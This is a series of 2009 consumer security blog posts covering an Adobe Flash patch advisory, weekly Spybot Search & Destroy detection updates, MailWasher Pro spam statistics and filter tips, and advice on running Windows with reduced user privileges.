Wiz's Computer and Website Security Blog

Adobe Flash Player (formerly Macromedia Flash) is a browser plug-in/add-on module that displays active "Flash" multimedia content in web pages. This active content can include audio, video, hyperlinks, and JavaScript. It is thought that Flash Player is installed in over 90% of the personal computers that connect to the Internet. For instance, if you watch YouTube videos on your PC you are doing so via a Flash Player plug-in. Got the picture? So do the bad guys, who are always looking for ways to hijack your PC through Flash vulnerabilities! Some of these vulnerabilities include the ability to forcefully redirect a browser to a hostile file location and download it without the user's knowledge, then execute it. This is currently being exploited by means of specially crafted Flash advertisements made by cyber criminals.

On February 24, 2009, Adobe Flash Player was patched to fix 5 critical vulnerabilities that could allow complete system takeover, without user interaction. This time it not only affects Windows computers, but also Mac OS X and Linux PCs. The new, patched version of Adobe Flash Player is 10.0.22.87. This patch must also be installed into the Adobe CS 4 Flash creation program, if you are a Flash content developer.

Here is a summary of the security advisory published on February 24, 2009...

Adobe Security Advisory APSB09-01

"A potential vulnerability has been identified in Adobe Flash Player 10.0.12.36 and earlier that could allow an attacker who successfully exploits this potential vulnerability to take control of the affected system. A malicious SWF must be loaded in Flash Player by the user for an attacker to exploit this potential vulnerability. Additional vulnerabilities have been addressed in this update. Adobe recommends users update to the most current version of Flash Player available for their platform."

Affected software versions:
Adobe Flash Player 10.0.12.36 and earlier (Adobe Flash Player 10.0.15.3 and earlier for Linux).

Adobe recommends all users of Adobe Flash Player 10.0.12.36 and earlier versions upgrade to the newest version 10.0.22.87 by downloading it from the Player Download Center, or by using the auto-update mechanism within the product when prompted. Only download the Flash Player and its updates from adobe.com! Cyber criminals try to fool people into installing fake Flash players as a means of distributing Botnet Trojans and fake anti virus products.

For users who cannot update to Flash Player 10, Adobe has developed a patched version of Flash Player 9, Flash Player 9.0.159.0, which you can download from this link.

If you use more than one browser you must install the update in each browser separately, by visiting the above-listed download page, as different browsers need different types of Flash. For instance, Interenet Explorer uses an ActiveX version of Flash Player, while Firefox, Opera and others use a browser plug-in version. After you install the update you must restart your browser for the update to "take." This flushes out the [previous version and registers the new one.

After restarting your browser you should go to the About Flash Player page to ensure that you now have the current version installed. I also recommend that you use the Secunia Online Software Inspector scanner to make sure all of your browser's add-ons are up to date, as well as your operating system patches.

I would like to close by stating that users who operate their computers with less than administrator privileges are less at risk from these browser plug-in exploits. Read my recent article about how running your PC with reduced user privileges stops up to 92% of malware infections and its related, linked-to articles.

Posted by Wiz at 1:52 PM | Permalink

back to top ^

Hey, you! If you use Spybot Search and Destroy to protect your computer against spyware, it is time to run your manual updates. New definitions and false positive fixes are usually released every Wednesday. Today's updates were released on schedule and are listed below.

In case you are new to Spybot S&D, there are two ways to update the program and malware definitions. The preferred method (For Windows PCs) is to go to Start > (All) Programs > Spybot - Search & Destroy > Update Spybot - S&D. The independent update box will open. Leave the default options as is, unless you need all languages or want beta definitions, and click on "Search." Another box will open with "mirror" locations around the world where you can download updates. Select a location nearest to you from the list and click on "Continue." Make sure all updates are checked, then click on "Download." If all definitions are verified as being correct the check marks will disappear from the check boxes and be replaced with green arrow graphics. However, sometimes one or more mirror locations have not updated all of the definitions and you will get a red X for those definitions. Click on Go Back, select a different mirror, and try again. I have consistent success using Giganet or the Safer-Networking servers.

When all updates have succeeded, click on "Exit." With the program updated it is time to open the main program interface, using either the Start Menu link, or a desktop icon, to launch Spybot Search and Destroy. The next item to take care of is to apply Immunization. Click on the Immunize button in the left sidebar, select everything you want, or uncheck things like cookies, or Hosts, or Domains, as you see fit, then click on Immunize button over the right panel, that has a green cross. After immunizing against unwanted items you should click on the Search &Destroy icon, on the left, then click "Check for problems," on the right side.

It will take several minutes, or longer to scan all your files for known threats, and possible threats, using heuristics, unless you disable heuristics in the program's main Advanced Mode > Settings. When the scan completes anything listed in the definition databases will be listed in the results window, with check boxes in front of each main item group. If you find the program has listed some cookies or other programs you use and trust, uncheck them, click on the item name and the right click and select "Exclude this product from further searches." Finally, click on "Fix (selected) Problems."

Spybot Search and Destroy 1.6.2 was released on January 26, 2009. This is probably going to be the last "maintenance release" before version 2.0 is released. It scans for threats about 4 times faster than previous versions and has an redesigned spyware removal engine. Upgrade now to Spybot S&D 1.6.2. The newest Virtumonde and Zlob threats require the anti malware engine in Spybot 1.6+ to effectively remove them.

Additions made on February 25, 2009:

Keyloggers
+ PerfectKeylogger

Malware (Includes rogue or fake anti-virus and anti-spyware programs and fake registry cleaners and fake security alerts, plus other nasty programs)
+ Fraud.MSAntispyware2009
+ Win32.TDSS.cls
+ Win32.TDSS.rtk

PUPS (Possibly UnPopular Software or Potentially Unwanted Program)
+ MyRegistryCleaner
+ OriginalSolitaire

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors and Rootkits.)
+ BraveSentry
+ InternetAntivirusPro
+ Virtumonde.atr
+ Virtumonde.prx
+ Virtumonde.sci
+ Virtumonde.sdn
+ Win32.Agent.ark
+ Win32.Agent.fbx
+ Win32.Agent.sd
+ Win32.Anel
+ Win32.Delf.axb
+ Win32.TDSS.alt
+ Win32.TDSS.clt
+ Win32.TDSS.eit
+ Win32.TDSS.flt
+ Win32.TDSS.rtk
+ Win32.TDSS.vlt
+ Win32.VB.qq

Total: 1406313 fingerprints in 444173 rules for 4561 products.

False positive detections reported or fixed this week:

Confirmed false positive detection of "Brontok.Ab" in a user's desktop ini file. This was fixed with today's updates.

A confirmed wrong detection of Virtumonde detected in C:\windows\system32\zipfdr.dll is due to users having older versions of Spybot S&D. Please upgrade to the current version, 1.6.2, download the newest definitions and F/F updates, then scan your system. These false positives should be gone (unless you really are infected!).

Oh boy! Here we go; get on your hard hats!

Spybot S&D is now flagging installations of McAfee and Trend Micro security software as "PUPs, or Potentially Unwanted Programs (see this forum thread). This was done in retaliation against those companies for requiring their customers to uninstall Spybot while installing their products. Team Spybot has tested its program with both of these security suites, and others, and finds no evidence of any incompatibilities or struggles between them.

If you have purchased McAfee or Trend Micro security suites (which are very good products) and they ask you to uninstall Spybot, or do so without your option to refuse, simply reinstall Spybot afterward. But, I recommend not activating the Tea Timer module in Spybot S&D, as this will cause a struggle over which program monitors the system for realtime changes.

---

Read my extended comments for more details about using Spybot S&D and for program development announcements.

Extended Comments

If you arrived here by searching for the name of some malware that may be on your computer and you are not currently using Spybot Search and Destroy, you can download the latest version from the Spybot Search and Destroy Multi-Lingual Landing Page. Choose your language, then use the link in the left sidebar to go to the downloads page. Download the program from your closest mirror server, install it, update it (Updates button), then follow the instructions below to detect and remove any malware that is on your PC. If Spybot is unable to remove an active threat it will ask for permission to run before Windows starts during the next reboot. Spybot will then run a complete scan before your Windows desktop loads, removing malware that has not yet loaded into memory.

If you see a program listed in the new detections, by its name, you should assume that is is malware (with the possible exception of the PUP group, which is up to user discretion). All of the programs listed with a single + sign are updated detections, while a double ++ in front of it's name indicates a brand new detection. A number in parenthesis, following a malware name, indicates the number of variants included in that detection. These programs are dangerous to your computer, and/or personal security or privacy.

The domain "Spywareinfo.com" and TrafficZ was recently added to the HOSTS file updates (for redirection to 127.0.0.1), because the domain name expired and was purchased by spammers or malware distributers, in December 2008. It is now advertising a fake Spybot Search & Destroy, fake security scans and various malware downloads. The new Spywareinfo malware removal forum is located at: http://www.spywareinfoforum.com/

Note for Firefox users who saved links to the old spywareinfo website:
It has recently (Feb/09) been reported that in some versions of Spybot S&D, on some operating systems, if you have a link to the old spywareinfo website, now owned by purveyors of fake anti spyware products and scanners, "fixing" it will erase your entire Bookmarks.html file. This is being looked into right now and hopefully will be fixed real soon. In the meantime, if you use Firefox as your browser (which stores Favorite places as "Bookmarks") and after running a scan Spybot lists an infected bookmark with Spywareinfo as the culprit, uncheck that entry before fixing any other problems. You can manually edit your Firefox Bookmarks to remove the link to that website, or any similar compromised website.

Malware Removal Guides

The good folks at Spybot S&D have started a new segment of their official forums, titled "Malware Removal Guides." Each week they intend to write a short self-help article to help you remove various common malware threats manually, or in conjunction with Spybot S&D. This should prove to be a very useful addition to the Spybot forums.

If you are still using Spybot S&D 1.3, or 1.4, update support is about to end and your computer will be at greater risk because of having out-dated definitions. Furthermore, older versions of Spybot are known to report lots of false positives, due to the advanced heuristic rules now found in the newer definition files.

If you are using any version older than 1.6 please upgrade to the current version of Spybot S&D, which is now 1.6.2, as soon as possible. New definitions for malware like the Virtumonde family of Trojans need the newer processing technologies introduced in version 1.6.0. Also, the number of malware definitions has more than doubled between July and December, 2008.

Work is progressing at a steady pace on Spybot S&D version 2.0, thanks to an army of volunteer beta testers. The upcoming version will be modularized, with separate executables carrying out different detection and immunization tasks now performed by the main program file. This is expected to speed up the scanning times, which is becoming more strenuous with the rapid increase in the number of detections being developed by Team Spybot.

To benefit from these improvements, I recommend that you update to Spybot Search & Destroy 1.6.2, which is available through the update function integrated into the application as well as from the Spybot S&D download page. When version 2.0 is finally released you should follow the to-be-posted instructions and upgrade to that version.

If your computer gets stuck in a logon/logoff loop, after updating and scanning with the older versions of Spybot, visit this forum page for a solution, from Team Spybot.

Of continued concern to people who operate as Limited or Power Users for their daily browsing and email, Spybot Search and Destroy is still corrupting your less privileged accounts after you update it, immunize and scan from an Administrator level account. If, after doing these things, you log off the Administrator account and try to log into your Limited/Power User account, it may be corrupted and a generic desktop and start menu may appear. Don't panic! Your account and desktop can be restored by simply rebooting the computer. When you login after the reboot your previous settings will reappear. I don't know why this happens, but, stuff happens! It may be related to the relatively new rootkit detection added last year.

If you want to get direct assistance from Team Spybot, or their talented volunteers, visit the Spybot support forums, sign up for a user account and post your request for assistance. Be sure to read the rules before posting a question or reply.

If your computer is infected and you need help removing the threats, go to the Malware Removal Forums, at Safer Networking/Spybot.info. Again, read the rules before posting your request or logs! Do NOT inject your problem into somebody else's thread! Start a new topic.

Some people are confused by detections of Wild Tangent on their computers. Wild Tangent is detected as a PUP, meaning Potentially Unwanted Program, because it does send home some identifiable information about you and your computer. It ships with various games and screen savers and is a means of funding those programs. If you knowingly installed Wild Tangent and aren't worried about it, and don't wish to have Spybot repeatedly display it in scan results, do the following: Right click the WildTangent Product in the Scan result and select to "Ignore the product from further searches."

If Spybot flags a file on your computer that you believe is a false positive detection, use caution and check with the Spybot False Positives Forum before allowing it to be deleted. You can submit a report to the Spybot False Positives forum, after signing up for an account and reading about how to report false positives before submitting your report and request for analysis.

Posted by Wiz at 3:10 PM | Permalink

back to top ^

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics.

Spam is still way down from last fall, thanks to the efforts of researchers in the security field. Starting with the takedown of the colocation facility McColo, on November 11, 2008, levels of incoming messages MailWasher identified as spam have dropped dramatically. That company provided hosting space and maintenance for privately owned servers that were used by spammers to command and control spam-sending Botnets. Those spammers are rebuilding or replacing their Botnets as I type this, so let's not become complacent. In fact, my spam count has been slowly increasing since the third week of January, 2009.

If you use MailWasher Pro you can enable the Blacklist function and add some pattern matching blacklist filters to automatically delete spam messages containing a forged From address matching either of these Regular Expressions: lin+met@+.de and kef+diz@+, in MailWasher Pro. These two blacklist rules caught over 22% of this week's spam.

MailWasher Pro spam category breakdown for Feb 16 - 22, 2009. Spam amounted to 16% of my incoming email this week. This represents a 6% increase from last week. The Botnets are coming back to life.

Blacklisted Domains/Senders: (by pattern matching wildcard rules like: lin+met@+.de and kef+diz@+)	22.73%
Hidden ISO Subject:	13.64%
Other filters: (See my MWP Filters page)	13.64%
Nigerian 419 Scams:	9.09%
Fake "Canadian Pharmacy" spam (fake Viagra, Cialis, etc):	9.09%
HTML Tricks: (ex: vertical, colored, or right-aligned spam words)	4.55%
Male enhancement spam (subject or body):	4.55%
Misc. Pharmaceutical spam (inc. Viagra, Cialis, Levitra & misc. pills & herbals):	4.55%
Numeric IP to Trojan download:	4.55%
Joe Job Bounces:	4.55%
PayPal Scams:	4.55%
Google Redirect to spam site:	4.55%

If you are reading this and wondering what you can do to reduce the sometimes huge volumes of spam emails that must be overwhelming your POP client inboxes, I recommend MailWasher Pro (with my downloadable custom filters) as an incoming email screener for your POP email program (Microsoft Outlook, Microsoft Outlook Express, Microsoft Live Mail, Eudora, Mozilla and other stand-alone email programs).

All of the spam and scams targeting my accounts were either automatically deleted by my custom MailWasher Pro spam filters, or if they made it through, was reported to SpamCop, of which I am a reporting member, and manually deleted. I never buy anything that is Spamvertised and recommend you don't either! Remember, almost all spam is now sent from compromised home or business PCs, zombies in various Botnets, all of which are controlled by criminals. If you purchase anything advertised in spam messages, you have given your credit or debit card information to the criminals behind that enterprise. If you are really lucky you will only be charged for the fake items you purchased, but, if not, you might find your credit limit used up, or your bank account emptied (for debit card transactions), by cyber criminals.

Also, unsubscribing through links in botnet-sent spam messages is futile, as you never opted-in, in the first place; your email address was captured by an email harvester on an infected computer belonging to somebody you corresponded with. Instead of receiving less spam as one might expect (by unsubscribing), all it does is confirm that your email address is active and you will see even more spam than before.

Another common way your email address may get harvested by spammers is if it appears in a large C.C. (Carbon Copy) list on a computer that gets Botnetted. Many people engage in forwarding messages among all their friends. Each time they forward chain letters their address gets added to the growing list of recipients (called Carbon Copy, or CC). If just one recipient of that message has an email harvesting malware infection, all of the email addresses listed in that message will be sent home to the spammer behind that spam run.

Smart folks who want to forward or send a message to multiple recipients use B.C.C. instead of C.C. Using B.C.C. hides all of the recipients from displaying. The To field will just show "Undisclosed Recipients" in a message sent using B.C.C. This is safest for you and your friends or mailing list. All email clients have a means of displaying a B.C.C. field.

Posted by Wiz at 3:29 PM | Permalink

back to top ^

According to a recent study by the BeyondTrust Corporation, titled "92 Percent of Critical Microsoft Vulnerabilities are Mitigated by Eliminating Admin Rights," most known and as yet unknown Windows exploit attacks will fail if the targeted PC is being operated with reduced user privileges. This means not running as an Administrator.

BeyondTrust's findings show that among the 2008 Microsoft vulnerabilities given a "critical" severity rating, 92 percent shared the same best practice advice from Microsoft to mitigate the vulnerability: "Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights." This language, found in the "Mitigating Factors" portion of Microsoft's security bulletins, also appears as a recommendation for reducing the threat from nearly 70 percent of all vulnerabilities reported in 2008.

As far back as May, 2007, I have published blog articles professing the added security to be gained by operating a PC with reduced user privileges. Furthermore, I published a web page titled: User Account Privileges Explained, describing the differences between the various types of user accounts available in Windows 2000 and XP. That page also contains instructions for elevating reduced user privileges by using the Windows "Run as" right-click option, when installing, or launching a program that was built with the assumption that a member of the Administrators Group would be running it.

Some of the benefits derived by reducing your user privileges for your daily browsing account may include the following:

• Most viruses cannot be installed


• Most spyware cannot be installed


• Most adware cannot be installed or survive a reboot


• Browser BHOs that hijack your home page and search may not be fully installed, or survive a reboot


• Rootkits cannot be installed


• Mistakes you make by visiting compromised websites will probably fail to cause any damage


• Botnet executables cannot take control of your computer


• Fake anti virus or anti spyware popup alerts will not be installed, or survive a reboot


• System Restore, Windows Defender, the Windows Firewall and Automatic Windows Updates cannot be disabled


• Your HOSTS file cannot be poisoned


• Worms, like the Conficker Worm cannot be installed, even via AutoPlay/AutoRun exploits


• Changes cannot be made to the HKLM branch of the Windows Registry


• Some programs cannot be installed, unless you use "Run as"


• Files cannot be saved to, deleted from, or overwritten with fake copies, in the Windows and System32 directories and sub-directories

To achieve all of the above protection one should change their daily browsing account type from "Computer Administrator" to "User" or "Limited User." If you are using a computer with a "Business" or "Professional" version of Windows you can run as a "Standard User" (Windows Vista and Windows 7), or "Power User" (Windows 2000 and XP), depending on your operating system. The benefits also presume that the owner or user is not tricked into installing the malware by using the "Run as (Administrator)" command. If you download a Trojan Horse program that you think is something useful and it turns out to be malware in disguise, you can infect the computer by Running it as an/the Administrator. Common sense and a high level of suspicion, along with a judicious amount of Googling about unrecognized programs, before installing them, can save your butt.

In the security business this is known by the pet name of "practicing safe hex!" If you are now operating your Windows 2000, XP, Vista, or Windows 7 PC as an/the Administrator, stop doing it now. Create a new Administrator level account, give it a good strong password, log out of your current account and into the new Administrator level account. This sets it up in the operating system and gives it a basic desktop setup. While you are logged into the new Administrator account go to Control Panel > Users and Passwords (whatever) and open your previous account name for editing. Change the old account "type" from "(Computer) Administrator" to "User," "Standard User," or "Limited User," depending on which OS you are using. When you next log into that account it will have all of the same settings, My Documents, Bookmarks/Favorites, email, preferences, etc, but will not be a member of the "Administrators Group." The account will be among the 92% that could be protected from malware attacks purely by virtue of having reduced user privileges. In reality, you will be in the minority, until more people learn to run without Administrator privileges.

If you are running Windows 2000 or XP Professional, Vista Business, or Windows 7, you can elevate a limited user account to a Power User or Standard User account by performing the following steps from an Administrator level account. Right-click on the (My) Computer icon and (left) select "Manage." Under Computer Management click on the + next to Local Users and Groups to expand it. Click on "Groups" to display all available user groups for your computer. If you see Power User, or Standard User (and Backup Operators) on the right side, you can elevate a limited account to that level. Click on Users to open a list of users in the right pane. Find your identity that you wish to control on the right and double click on it. Click on the tab - "Member Of" and review the group(s) it belongs to. If it shows User, or Limited User then click on the "Add" button, at the bottom. Type the name of the user group you wish to add, then click on the "Check Names" button. It will fill in necessary details about that account type, or allow you to edit the group name, until you get one right. When the new group membership is correctly listed, click OK. Click Apply, then OK, to close the dialog boxes, then close the Computer Management Console.

You can also open the Computer Management Console by copying and pasting this command into your "Run" box: compmgmt.msc

Posted by Wiz at 7:34 PM | Permalink

back to top ^

Hey, you! If you use Spybot Search and Destroy to protect your computer against spyware, it is time to run your manual updates. New definitions and false positive fixes are usually released every Wednesday. Today's updates were released on schedule and are listed below.

In case you are new to Spybot S&D, there are two ways to update the program and malware definitions. The preferred method (For Windows PCs) is to go to Start > (All) Programs > Spybot - Search & Destroy > Update Spybot - S&D. The independent update box will open. Leave the default options as is, unless you need all languages or want beta definitions, and click on "Search." Another box will open with "mirror" locations around the world where you can download updates. Select a location nearest to you from the list and click on "Continue." Make sure all updates are checked, then click on "Download." If all definitions are verified as being correct the check marks will disappear from the check boxes and be replaced with green arrow graphics. However, sometimes one or more mirror locations have not updated all of the definitions and you will get a red X for those definitions. Click on Go Back, select a different mirror, and try again. I have consistent success using Giganet or the Safer-Networking servers.

When all updates have succeeded, click on "Exit." With the program updated it is time to open the main program interface, using either the Start Menu link, or a desktop icon, to launch Spybot Search and Destroy. The next item to take care of is to apply Immunization. Click on the Immunize button in the left sidebar, select everything you want, or uncheck things like cookies, or Hosts, or Domains, as you see fit, then click on Immunize button over the right panel, that has a green cross. After immunizing against unwanted items you should click on the Search &Destroy icon, on the left, then click "Check for problems," on the right side.

It will take several minutes, or longer to scan all your files for known threats, and possible threats, using heuristics, unless you disable heuristics in the program's main Advanced Mode > Settings. When the scan completes anything listed in the definition databases will be listed in the results window, with check boxes in front of each main item group. If you find the program has listed some cookies or other programs you use and trust, uncheck them, click on the item name and the right click and select "Exclude this product from further searches." Finally, click on "Fix (selected) Problems."

Spybot Search and Destroy 1.6.2 was released on January 26, 2009. This is probably going to be the last "maintenance release" before version 2.0 is released. It scans for threats about 4 times faster than previous versions and has an redesigned spyware removal engine. Upgrade now to Spybot S&D 1.6.2. The newest Virtumonde and Zlob threats require the anti malware engine in Spybot 1.6+ to effectively remove them.

Additions made on February 18, 2009:

Keyloggers
+ PerfectKeylogger

Malware (Includes rogue or fake anti-virus and anti-spyware programs and fake registry cleaners and fake security alerts, plus other nasty programs)
+ AdDestination
+ Smitfraud-C.
+ Win32.Bomka.r
+ Win32.Constructor.DOS.Vkit
+ Win32.Flooder


Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors and Rootkits.)
+ Virtumonde
+ Virtumonde.prx
+ Virtumonde.sci
+ Virtumonde.sdn
+ Win32.Agent.fox
+ Win32.Agent.frl
+ Win32.Agent.ju
+ Win32.Asprox (Botnet)
+ Win32.TDSS.rtk
+ Win32.VB.qu
+ Zlob.Downloader.suo
+ Zlob.Downloader.vet
+ Zlob.Downloader.vot
+ Zlob.VideoCompressionCodec

Total: 1343105 fingerprints in 384000 rules for 4559 products.

False positive detections reported or fixed this week:

Nothing new to report at this time, except that after ongoing dialogs, SpywareCease still remains classified as malware, by Spybot S&D. This may change in the future, but for now that program is treated as unwanted software.

Read my extended comments for more details about using Spybot S&D and for program development announcements.

Extended Comments

If you arrived here by searching for the name of some malware that may be on your computer and you are not currently using Spybot Search and Destroy, you can download the latest version from the Spybot Search and Destroy Multi-Lingual Landing Page. Choose your language, then use the link in the left sidebar to go to the downloads page. Download the program from your closest mirror server, install it, update it (Updates button), then follow the instructions below to detect and remove any malware that is on your PC. If Spybot is unable to remove an active threat it will ask for permission to run before Windows starts during the next reboot. Spybot will then run a complete scan before your Windows desktop loads, removing malware that has not yet loaded into memory.

If you see a program listed in the new detections, by its name, you should assume that is is malware (with the possible exception of the PUP group, which is up to user discretion). All of the programs listed with a single + sign are updated detections, while a double ++ in front of it's name indicates a brand new detection. A number in parenthesis, following a malware name, indicates the number of variants included in that detection. These programs are dangerous to your computer, and/or personal security or privacy.

The domain "Spywareinfo.com" and TrafficZ was recently added to the HOSTS file updates (for redirection to 127.0.0.1), because the domain name expired and was purchased by spammers or malware distributers, in December 2008. It is now advertising a fake Spybot Search & Destroy, fake security scans and various malware downloads. The new Spywareinfo malware removal forum is located at: http://www.spywareinfoforum.com/

Note for Firefox users who saved links to the old spywareinfo website:
It has recently (Feb/09) been reported that in some versions of Spybot S&D, on some operating systems, if you have a link to the old spywareinfo website, now owned by purveyors of fake anti spyware products and scanners, "fixing" it will erase your entire Bookmarks.html file. This is being looked into right now and hopefully will be fixed real soon. In the meantime, if you use Firefox as your browser (which stores Favorite places as "Bookmarks") and after running a scan Spybot lists an infected bookmark with Spywareinfo as the culprit, uncheck that entry before fixing any other problems. You can manually edit your Firefox Bookmarks to remove the link to that website, or any similar compromised website.

Malware Removal Guides

The good folks at Spybot S&D have started a new segment of their official forums, titled "Malware Removal Guides." Each week they intend to write a short self-help article to help you remove various common malware threats manually, or in conjunction with Spybot S&D. This should prove to be a very useful addition to the Spybot forums.

If you are still using Spybot S&D 1.3, or 1.4, update support is about to end and your computer will be at greater risk because of having out-dated definitions. Furthermore, older versions of Spybot are known to report lots of false positives, due to the advanced heuristic rules now found in the newer definition files.

If you are using any version older than 1.6 please upgrade to the current version of Spybot S&D, which is now 1.6.2, as soon as possible. New definitions for malware like the Virtumonde family of Trojans need the newer processing technologies introduced in version 1.6.0. Also, the number of malware definitions has more than doubled between July and December, 2008.

Work is progressing at a steady pace on Spybot S&D version 2.0, thanks to an army of volunteer beta testers. The upcoming version will be modularized, with separate executables carrying out different detection and immunization tasks now performed by the main program file. This is expected to speed up the scanning times, which is becoming more strenuous with the rapid increase in the number of detections being developed by Team Spybot.

To benefit from these improvements, I recommend that you update to Spybot Search & Destroy 1.6.2, which is available through the update function integrated into the application as well as from the Spybot S&D download page. When version 2.0 is finally released you should follow the to-be-posted instructions and upgrade to that version.

If your computer gets stuck in a logon/logoff loop, after updating and scanning with the older versions of Spybot, visit this forum page for a solution, from Team Spybot.

Of continued concern to people who operate as Limited or Power Users for their daily browsing and email, Spybot Search and Destroy is still corrupting your less privileged accounts after you update it, immunize and scan from an Administrator level account. If, after doing these things, you log off the Administrator account and try to log into your Limited/Power User account, it may be corrupted and a generic desktop and start menu may appear. Don't panic! Your account and desktop can be restored by simply rebooting the computer. When you login after the reboot your previous settings will reappear. I don't know why this happens, but, stuff happens! It may be related to the relatively new rootkit detection added last year.

If you want to get direct assistance from Team Spybot, or their talented volunteers, visit the Spybot support forums, sign up for a user account and post your request for assistance. Be sure to read the rules before posting a question or reply.

If your computer is infected and you need help removing the threats, go to the Malware Removal Forums, at Safer Networking/Spybot.info. Again, read the rules before posting your request or logs! Do NOT inject your problem into somebody else's thread! Start a new topic.

Some people are confused by detections of Wild Tangent on their computers. Wild Tangent is detected as a PUP, meaning Potentially Unwanted Program, because it does send home some identifiable information about you and your computer. It ships with various games and screen savers and is a means of funding those programs. If you knowingly installed Wild Tangent and aren't worried about it, and don't wish to have Spybot repeatedly display it in scan results, do the following: Right click the WildTangent Product in the Scan result and select to "Ignore the product from further searches."

If Spybot flags a file on your computer that you believe is a false positive detection, use caution and check with the Spybot False Positives Forum before allowing it to be deleted. You can submit a report to the Spybot False Positives forum, after signing up for an account and reading about how to report false positives before submitting your report and request for analysis.

Posted by Wiz at 6:00 PM | Permalink

back to top ^

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics.

Spam is still way down from last fall, thanks to the efforts of researchers in the security field. Starting with the takedown of the colocation facility McColo, on November 11, 2008, levels of incoming messages MailWasher identified as spam have dropped dramatically. That company provided hosting space and maintenance for privately owned servers that were used by spammers to command and control spam-sending Botnets. Those spammers are rebuilding or replacing their Botnets as I type this, so let's not become complacent. In fact, my spam count has been increasing at the rate of about 1% per week, since the third week of January, 2009.

If you use MailWasher Pro you can enable the Blacklist function and add some pattern matching blacklist filters to automatically delete spam messages containing a forged From address matching either of these Regular Expressions: lin+met@+.de and kef+diz@+, in MailWasher Pro. These two blacklist rules caught 5% of this week's spam. This is way down from last week when those two filters stopped 1/3 of all the incoming spam. Another Botnet must have gone offline.

MailWasher Pro spam category breakdown for Feb 9 - 15, 2009. Spam amounted to only 10% of my incoming email this week.

Viagra spam:	25.00%
Hidden ISO Subject:	25.00%
HTML Tricks: (ex: vertical, colored, or right-aligned spam words)	10.00%
Male enhancement spam (subject or body):	10.00%
Known Spam Subjects (by my filters):	5.00%
Nigerian 419 Scams:	5.00%
Blacklisted Domains/Senders: (by pattern matching wildcard rules like: lin+met@+.de and kef+diz@+)	5.00%
Fake "Canadian Pharmacy" spam (fake Viagra, Cialis, etc):	5.00%
Misc. Pharmaceutical spam (inc. Viagra, Cialis, Levitra & misc. pills & herbals):	5.00%
Dating scams:	5.00%

If you are reading this and wondering what you can do to reduce the sometimes huge volumes of spam emails that must be overwhelming your POP client inboxes, I recommend MailWasher Pro (with my downloadable custom filters) as an incoming email screener for your POP email program (Microsoft Outlook, Microsoft Outlook Express, Microsoft Live Mail, Eudora, Mozilla and other stand-alone email programs).

All of the spam and scams targeting my accounts were either automatically deleted by my custom MailWasher Pro spam filters, or if they made it through, was reported to SpamCop, of which I am a reporting member, and manually deleted. I never buy anything that is Spamvertised and recommend you don't either! Remember, almost all spam is now sent from compromised home or business PCs, zombies in various Botnets, all of which are controlled by criminals. If you purchase anything advertised in spam messages, you have given your credit or debit card information to the criminals behind that enterprise. If you are really lucky you will only be charged for the fake items you purchased, but, if not, you might find your credit limit used up, or your bank account emptied (for debit card transactions), by cyber criminals.

Also, unsubscribing through links in botnet-sent spam messages is futile, as you never opted-in, in the first place; your email address was captured by an email harvester on an infected computer belonging to somebody you corresponded with. Instead of receiving less spam as one might expect (by unsubscribing), all it does is confirm that your email address is active and you will see even more spam than before.

Another common way your email address may get harvested by spammers is if it appears in a large C.C. (Carbon Copy) list on a computer that gets Botnetted. Many people engage in forwarding messages among all their friends. Each time they forward chain letters their address gets added to the growing list of recipients (called Carbon Copy, or CC). If just one recipient of that message has an email harvesting malware infection, all of the email addresses listed in that message will be sent home to the spammer behind that spam run.

Smart folks who want to forward or send a message to multiple recipients use B.C.C. instead of C.C. Using B.C.C. hides all of the recipients from displaying. The To field will just show "Undisclosed Recipients" in a message sent using B.C.C. This is safest for you and your friends or mailing list. All email clients have a means of displaying a B.C.C. field.

Posted by Wiz at 4:00 PM | Permalink

back to top ^

After three months of reduced spam volumes I am now seeing a sudden resurgence, especially in the form of the fake Canadian Pharmacy, unapproved Asian made Viagra and various male enhancement pills, strips and patches. All of this spam, like all spam from the year before, is sent via compromised Windows computers which have been unknowingly recruited in spam Botnets. These Botnets are commanded and controlled by criminals in Eastern Europe (in the former Soviet Union) and other places where authorities tend to turn a blind eye to cyber criminal activities.

It is difficult to know which Botnet is sending out this new round of pharmacy spam without capturing a Bot and logging its actions and reading its spam templates, but this has all the earmarks of the Mega-D Botnet (speculation). Mega-D, otherwise know as Ozdok, was one of the most prolific Botnets still running after the takedown of the McColo Corp. spam control and command servers, on November 11, 2008. The majority of the colocation servers in that facility were used for illegal activities, including command and control of several Botnets. It was the first to re-emerge and resume spamming and is very likely responsible for the current resurgence I saw yesterday and today. If not, it is a similar Botnet, being rented out to spammers (the Bot Masters usually rent portions of their Botnets to spammers, rather than doing any spamming themselves).

I didn't write my usual Sunday spam report this week, because the amount of spam for the week of February 2 - 8, 2009 was ridiculously low (around 7%) and only encompassed four categories, as defined by my MailWasher Pro custom filter rules. Still, a pattern was developing an I can now report on it. Maybe this will help others in identifying the Botnet behind this recent spam run. Most of the spam coming in from February 8 through 11 is identified by my "Hidden ISO or ASCII Subject" filter. The emails sent to English speaking North American inboxes do not require any ISO or ASCII codes to be read by the recipients, as long as the Subjects are typed in English. However, messages composed in European locations, or in Asia, by non-English speakers might require this code to become readable at various destinations. They can tailor the ISO code to display the spam subject in the language of the desired recipient country. This is what has been going on since the Mega-D Botnet emerged in late November, 2008.

For you folks who use MailWasher Pro to filter out spam and aren't using my custom filters already can apply the following filter to detect and either flag, or auto-delete any spam containing a hidden ISO subject. The following code must only occupy one long line and goes into your filters.txt file, located in your logged in identity's %AppData%\MailWasherPro folder. Note, that you must close MailWasher before editing filters.txt, save the changes, then reopen the program.

